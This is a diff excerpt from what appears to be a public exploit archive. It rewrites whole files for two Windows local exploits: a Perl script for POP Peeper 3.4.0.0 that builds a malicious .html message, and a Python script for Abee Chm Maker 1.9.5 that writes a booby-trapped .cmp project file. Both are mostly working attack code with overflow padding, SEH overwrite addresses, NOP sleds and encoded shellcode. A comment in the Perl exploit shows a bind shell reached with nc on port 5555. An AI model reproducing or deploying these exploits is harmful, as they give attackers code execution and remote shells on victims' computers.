+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # End Junk
+"\xeb\x06\x90\x90". # Next_Seh
+"\x4c\x51\x01\x10". # SEh ( Universal )
+"\x90\x90\x90\x90\x90\x90\x90\x90". # Start Nop
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". # End Nop
+"\xeb\x03\x59\xeb". # Start Scode
+"\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56".
+"\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42".
+"\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44".
+"\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a".
+"\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44\x42\x50\x42\x50".
+"\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47\x45\x30\x4a\x57".
+"\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48\x4f\x55\x42\x52".
+"\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48\x41\x50\x50\x4e".
+"\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c\x46\x37\x47\x50".
+"\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e\x46\x4f\x4b\x53".
+"\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38\x4f\x45\x46\x32".
+"\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54\x4b\x48\x4f\x45".
+"\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58\x41\x50\x4b\x4e".
+"\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43\x42\x4c\x46\x36".
+"\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57\x4e\x30\x4b\x48".
+"\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x4a\x46".
+"\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b\x42\x50\x42\x50".
+"\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33\x48\x4f\x42\x36".
+"\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47\x42\x55\x4a\x46".
+"\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39\x50\x4f\x4c\x38".
+"\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36\x4e\x56\x43\x36".
+"\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a". # End Scode
+"\x0d\x54\x4f\x3a". # Start Second Header
+"\x20\x53\x74\x61\x63\x6b\x20\x3a\x64\x20\x0d\x0d\x0d".
+"\x0d"; # End Second Header
+print $mp;
+
+# milw0rm.com [2009-03-23]
diff --git a/platforms/windows/local/8275.pl b/platforms/windows/local/8275.pl
index c74b38c51..6d9592e7c 100755
--- a/platforms/windows/local/8275.pl
+++ b/platforms/windows/local/8275.pl
@@ -1,102 +1,102 @@
-# POP Peeper 3.4.0.0 .html file Universal SEH Overwrite Exploit
-# Exploit By Stack
-# Mountassif Moad
-# How to use : file > Open message or Ctrl + O
-# Select The .html file ......>>
-# Connect With 5555 Port
-# C:\nc>nc -v 127.0.0.1 5555
-# DNS fwd/rev mismatch: localhost != stack-a4eeb2267
-# localhost [127.0.0.1] 5555 (?) open
-# Microsoft Windows XP [version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-# C:\Program Files\POP Peeper>
-# Boom Box Connected :d
-# Thnx Simo- SOft - Jadi - Str0ke
-# usage perl xpl.pl >>stack.html
-my $mp=
-################
-"\x46\x52\x4F\x4D\x3A\x20". # First Header
-################
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # Start Junk
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # End Junk
-################
-"\xeb\x06\x90\x90". # Next_Seh
-"\x4c\x51\x01\x10". # SEh ( Universal )
-################
-"\x90\x90\x90\x90\x90\x90\x90\x90". # Start Nop
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". # End Nop
-################
-# Start Scode
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e".
-"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".
-"\x4e\x36\x46\x42\x46\x42\x4b\x38\x45\x54\x4e\x43\x4b\x58\x4e\x57".
-"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58".
-"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x38".
-"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
-"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x38".
-"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
-"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38".
-"\x49\x58\x4e\x36\x46\x52\x4e\x51\x41\x56\x43\x4c\x41\x53\x4b\x4d".
-"\x46\x36\x4b\x38\x43\x34\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x48".
-"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36".
-"\x50\x58\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46".
-"\x43\x45\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57".
-"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e".
-"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
-"\x48\x56\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x56\x44\x30".
-"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
-"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x45\x43\x55\x43\x55\x43\x44".
-"\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x45\x31".
-"\x43\x4b\x48\x56\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a".
-"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41".
-"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
-"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d".
-"\x4a\x56\x45\x4e\x49\x54\x48\x48\x49\x44\x47\x35\x4f\x4f\x48\x4d".
-"\x42\x45\x46\x35\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x49\x4a\x46".
-"\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55".
-"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x36\x43\x56".
-"\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x55\x49\x32\x4e\x4c".
-"\x49\x48\x47\x4e\x4c\x36\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c".
-"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x44\x4e\x32".
-"\x43\x39\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
-"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f".
-"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x55\x41\x45\x41\x55\x4c\x46".
-"\x41\x50\x41\x45\x41\x35\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x56".
-"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56".
-"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f".
-"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d".
-"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d".
-"\x4f\x4f\x42\x4d\x5a".
- # End Scode
-################
-"\x0D\x54\x4F\x3A\x20\x53\x74\x61\x63\x6B\x20\x3A\x64\x20". # Second Header
-"\x0D\x0D";
-################
-print $mp;
-
-# milw0rm.com [2009-03-23]
+# POP Peeper 3.4.0.0 .html file Universal SEH Overwrite Exploit
+# Exploit By Stack
+# Mountassif Moad
+# How to use : file > Open message or Ctrl + O
+# Select The .html file ......>>
+# Connect With 5555 Port
+# C:\nc>nc -v 127.0.0.1 5555
+# DNS fwd/rev mismatch: localhost != stack-a4eeb2267
+# localhost [127.0.0.1] 5555 (?) open
+# Microsoft Windows XP [version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+# C:\Program Files\POP Peeper>
+# Boom Box Connected :d
+# Thnx Simo- SOft - Jadi - Str0ke
+# usage perl xpl.pl >>stack.html
+my $mp=
+################
+"\x46\x52\x4F\x4D\x3A\x20". # First Header
+################
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # Start Junk
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # End Junk
+################
+"\xeb\x06\x90\x90". # Next_Seh
+"\x4c\x51\x01\x10". # SEh ( Universal )
+################
+"\x90\x90\x90\x90\x90\x90\x90\x90". # Start Nop
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". # End Nop
+################
+# Start Scode
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e".
+"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".
+"\x4e\x36\x46\x42\x46\x42\x4b\x38\x45\x54\x4e\x43\x4b\x58\x4e\x57".
+"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58".
+"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x38".
+"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
+"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x38".
+"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
+"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38".
+"\x49\x58\x4e\x36\x46\x52\x4e\x51\x41\x56\x43\x4c\x41\x53\x4b\x4d".
+"\x46\x36\x4b\x38\x43\x34\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x48".
+"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36".
+"\x50\x58\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46".
+"\x43\x45\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57".
+"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e".
+"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
+"\x48\x56\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x56\x44\x30".
+"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
+"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x45\x43\x55\x43\x55\x43\x44".
+"\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x45\x31".
+"\x43\x4b\x48\x56\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a".
+"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41".
+"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
+"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d".
+"\x4a\x56\x45\x4e\x49\x54\x48\x48\x49\x44\x47\x35\x4f\x4f\x48\x4d".
+"\x42\x45\x46\x35\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x49\x4a\x46".
+"\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55".
+"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x36\x43\x56".
+"\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x55\x49\x32\x4e\x4c".
+"\x49\x48\x47\x4e\x4c\x36\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c".
+"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x44\x4e\x32".
+"\x43\x39\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
+"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f".
+"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x55\x41\x45\x41\x55\x4c\x46".
+"\x41\x50\x41\x45\x41\x35\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x56".
+"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56".
+"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f".
+"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d".
+"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d".
+"\x4f\x4f\x42\x4d\x5a".
+ # End Scode
+################
+"\x0D\x54\x4F\x3A\x20\x53\x74\x61\x63\x6B\x20\x3A\x64\x20". # Second Header
+"\x0D\x0D";
+################
+print $mp;
+
+# milw0rm.com [2009-03-23]
diff --git a/platforms/windows/local/8299.py b/platforms/windows/local/8299.py
index dbc421de2..66c44d11b 100755
--- a/platforms/windows/local/8299.py
+++ b/platforms/windows/local/8299.py
@@ -1,100 +1,100 @@
-# exploit.py
-# Abee Chm Maker 1.9.5 Stack overflow Exploit
-# By:Encrypt3d.M!nd
-#
-# After importing "Devil_inside.cmp" file into the program
-# go to File>>Make CHM.. Then...watch  :) .
-#
-# i've used SEH overwrite method to make it more stable.
-# btw:it's universal so don't bother your self with finding addresses  ;) 
-#
-
-ns = "\xEB\x06\x90\x90"
-sh = "\x05\x67\x35\x45"
-
-shellcode = (
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-"\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
-"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x71\x32\x42\x42\x42\x32"
-"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x4d"
-"\x38\x43\x74\x35\x50\x53\x30\x77\x70\x4e\x6b\x53\x75\x77\x4c\x4c"
-"\x4b\x63\x4c\x54\x45\x34\x38\x67\x71\x5a\x4f\x6c\x4b\x62\x6f\x75"
-"\x48\x6e\x6b\x41\x4f\x47\x50\x33\x31\x58\x6b\x63\x79\x4e\x6b\x36"
-"\x54\x4c\x4b\x45\x51\x68\x6e\x34\x71\x59\x50\x4c\x59\x4c\x6c\x4f"
-"\x74\x6f\x30\x72\x54\x47\x77\x58\x41\x39\x5a\x34\x4d\x57\x71\x69"
-"\x52\x48\x6b\x69\x64\x67\x4b\x46\x34\x66\x44\x74\x44\x53\x45\x6b"
-"\x55\x4c\x4b\x43\x6f\x31\x34\x67\x71\x78\x6b\x63\x56\x4c\x4b\x54"
-"\x4c\x62\x6b\x6e\x6b\x31\x4f\x67\x6c\x37\x71\x78\x6b\x4c\x4b\x45"
-"\x4c\x4c\x4b\x73\x31\x4a\x4b\x6c\x49\x51\x4c\x74\x64\x67\x74\x6b"
-"\x73\x34\x71\x6f\x30\x42\x44\x6c\x4b\x71\x50\x34\x70\x4e\x65\x4f"
-"\x30\x62\x58\x46\x6c\x6c\x4b\x41\x50\x44\x4c\x4c\x4b\x42\x50\x65"
-"\x4c\x4e\x4d\x6e\x6b\x50\x68\x34\x48\x4a\x4b\x73\x39\x6e\x6b\x4b"
-"\x30\x4c\x70\x57\x70\x63\x30\x37\x70\x4e\x6b\x42\x48\x57\x4c\x51"
-"\x4f\x56\x51\x48\x76\x31\x70\x73\x66\x6e\x69\x59\x68\x4e\x63\x4f"
-"\x30\x73\x4b\x66\x30\x65\x38\x68\x70\x6d\x5a\x34\x44\x51\x4f\x30"
-"\x68\x4e\x78\x4b\x4e\x6c\x4a\x54\x4e\x32\x77\x79\x6f\x79\x77\x41"
-"\x73\x75\x31\x72\x4c\x41\x73\x57\x70\x61")
-
-header1 = (
-'<?xml version="1.0" encoding="Windows-1252" ?>\n'
-'<XMLConfig><info>Chm Maker project</info>\n'
-'<group name="Contents">\n'
-' <group name="0">\n'
-'  <param name="Caption">filename</param>\n'
-'  <param name="Level">0</param>\n'
-'  <param name="FileName">'+"\x41"*320+ns+sh+"\x90"*20+shellcode+"\x41" * 5000)
-
-header2 = (
-'</param>\n'
-' </group>\n'
-' <param name="Count">1</param>\n'
-'</group>\n'
-'<group name="Keywords">\n'
-' <param name="Count">0</param>\n'
-'</group>\n'
-'<group name="KeywordsFinder">\n'
-' <param name="UseMeta">1</param>\n'
-' <param name="UseBold">1</param>\n'
-' <param name="UseItalic">0</param>\n'
-' <param name="UseUnder">0</param>\n'
-' <param name="UseHTag">1</param>\n'
-' <param name="UseTabHeader">0</param>\n'
-' <param name="MaxKeyLength">32</param>\n'
-' <param name="LiveUpdate">0</param>\n'
-'</group>\n'
-'<group name="Customize">\n'
-' <param name="MainTitle">kkkkkkkkkkkkkkk</param>\n'
-' <param name="DefaultPage"></param>\n'
-' <param name="Left">0</param>\n'
-' <param name="Top">0</param>\n'
-' <param name="Width">0</param>\n'
-' <param name="Heigth">0</param>\n'
-' <param name="HideShow">1</param>\n'
-' <param name="Back">1</param>\n'
-' <param name="Forward">1</param>\n'
-' <param name="Stop">0</param>\n'
-' <param name="Refresh">0</param>\n'
-' <param name="Options">1</param>\n'
-' <param name="Print">1</param>\n'
-' <param name="Font">0</param>\n'
-' <param name="Locate">0</param>\n'
-' <param name="Home">0</param>\n'
-' <param name="HomePage"></param>\n'
-' <param name="Jump1">0</param>\n'
-' <param name="Jump1Page"></param>\n'
-' <param name="Jump1Title"></param>\n'
-' <param name="Jump2">0</param>\n'
-' <param name="Jump2Page"></param>\n'
-' <param name="Jump2Title"></param>\n'
-' <param name="Search">1</param>\n'
-' <param name="AdditionalFiles"></param>\n'
-'</group>\n'
-'</XMLConfig>\n'
-)
-
-
-file=open('Devil_Inside.cmp','w')
-file.write(header1+header2)
-file.close()
-
-# milw0rm.com [2009-03-27]
+# exploit.py
+# Abee Chm Maker 1.9.5 Stack overflow Exploit
+# By:Encrypt3d.M!nd
+#
+# After importing "Devil_inside.cmp" file into the program
+# go to File>>Make CHM.. Then...watch  :) .
+#
+# i've used SEH overwrite method to make it more stable.
+# btw:it's universal so don't bother your self with finding addresses  ;) 
+#
+
+ns = "\xEB\x06\x90\x90"
+sh = "\x05\x67\x35\x45"
+
+shellcode = (
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
+"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x71\x32\x42\x42\x42\x32"
+"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x4d"
+"\x38\x43\x74\x35\x50\x53\x30\x77\x70\x4e\x6b\x53\x75\x77\x4c\x4c"
+"\x4b\x63\x4c\x54\x45\x34\x38\x67\x71\x5a\x4f\x6c\x4b\x62\x6f\x75"
+"\x48\x6e\x6b\x41\x4f\x47\x50\x33\x31\x58\x6b\x63\x79\x4e\x6b\x36"
+"\x54\x4c\x4b\x45\x51\x68\x6e\x34\x71\x59\x50\x4c\x59\x4c\x6c\x4f"
+"\x74\x6f\x30\x72\x54\x47\x77\x58\x41\x39\x5a\x34\x4d\x57\x71\x69"
+"\x52\x48\x6b\x69\x64\x67\x4b\x46\x34\x66\x44\x74\x44\x53\x45\x6b"
+"\x55\x4c\x4b\x43\x6f\x31\x34\x67\x71\x78\x6b\x63\x56\x4c\x4b\x54"
+"\x4c\x62\x6b\x6e\x6b\x31\x4f\x67\x6c\x37\x71\x78\x6b\x4c\x4b\x45"
+"\x4c\x4c\x4b\x73\x31\x4a\x4b\x6c\x49\x51\x4c\x74\x64\x67\x74\x6b"
+"\x73\x34\x71\x6f\x30\x42\x44\x6c\x4b\x71\x50\x34\x70\x4e\x65\x4f"
+"\x30\x62\x58\x46\x6c\x6c\x4b\x41\x50\x44\x4c\x4c\x4b\x42\x50\x65"
+"\x4c\x4e\x4d\x6e\x6b\x50\x68\x34\x48\x4a\x4b\x73\x39\x6e\x6b\x4b"
+"\x30\x4c\x70\x57\x70\x63\x30\x37\x70\x4e\x6b\x42\x48\x57\x4c\x51"
+"\x4f\x56\x51\x48\x76\x31\x70\x73\x66\x6e\x69\x59\x68\x4e\x63\x4f"
+"\x30\x73\x4b\x66\x30\x65\x38\x68\x70\x6d\x5a\x34\x44\x51\x4f\x30"
+"\x68\x4e\x78\x4b\x4e\x6c\x4a\x54\x4e\x32\x77\x79\x6f\x79\x77\x41"
+"\x73\x75\x31\x72\x4c\x41\x73\x57\x70\x61")
+
+header1 = (
+'<?xml version="1.0" encoding="Windows-1252" ?>\n'
+'<XMLConfig><info>Chm Maker project</info>\n'
+'<group name="Contents">\n'
+' <group name="0">\n'
+'  <param name="Caption">filename</param>\n'
+'  <param name="Level">0</param>\n'
+'  <param name="FileName">'+"\x41"*320+ns+sh+"\x90"*20+shellcode+"\x41" * 5000)
+
+header2 = (
+'</param>\n'
+' </group>\n'
+' <param name="Count">1</param>\n'
+'</group>\n'
+'<group name="Keywords">\n'
+' <param name="Count">0</param>\n'
+'</group>\n'
+'<group name="KeywordsFinder">\n'
+' <param name="UseMeta">1</param>\n'
+' <param name="UseBold">1</param>\n'
+' <param name="UseItalic">0</param>\n'
+' <param name="UseUnder">0</param>\n'
+' <param name="UseHTag">1</param>\n'
